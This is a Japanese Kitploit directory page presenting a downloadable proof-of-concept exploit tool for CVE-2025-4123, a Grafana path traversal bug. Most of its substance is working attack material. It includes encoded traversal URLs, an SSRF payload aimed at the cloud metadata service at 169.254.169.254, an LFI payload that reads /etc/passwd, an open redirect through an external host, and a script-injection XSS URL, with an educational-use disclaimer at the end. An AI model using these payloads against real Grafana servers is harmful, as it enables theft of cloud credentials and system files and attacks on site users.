Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-4123-Exploit-Tool-Grafana- — CVE-2025-4123 - Grafana ツール | Kitploit
ツール/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Grafana ツール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
3261年前Kitploit レビュー済み

CVE-2025-4123 - Grafana パストラバーサルエクスプロイト

mitsec によって開発されました

これは CVE-2025-4123 用の概念実証 (PoC) エクスプロイトツールです。CVE-2025-4123 は、Grafana の /public エンドポイントにおける深刻なパストラバーサル脆弱性です。このエクスプロイトにより、次のことが可能になります:

  • ✅ サーバーサイドリクエストフォージェリ (SSRF)
  • ✅ ローカルファイルインクルージョン (LFI)
  • ✅ オープンリダイレクト
  • ✅ クロスサイトスクリプティング (XSS)

🔥 影響を受ける対象

Grafana インスタンスのうち、/public/ エンドポイントが次のようなエンコードされたパスを不適切に処理するもの:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 使用方法

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

次に、目的のモードを選択します:

  1. SSRF - 169.254.169.254 などの内部サービス
  2. LFI - /etc/passwd などのファイルを読み取り
  3. オープンリダイレクト - 外部ドメインへのリダイレクト
  4. XSS - 公開パスへの JavaScript インジェクション

🧪 例

root@kitploit:~
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E

📄 免責事項

このコードは教育目的および許可されたテスト目的でのみ提供されています。同意なしにシステムに対して不正に使用することは違法です。


✍️ 作者

  • mitsec
ツールをダウンロード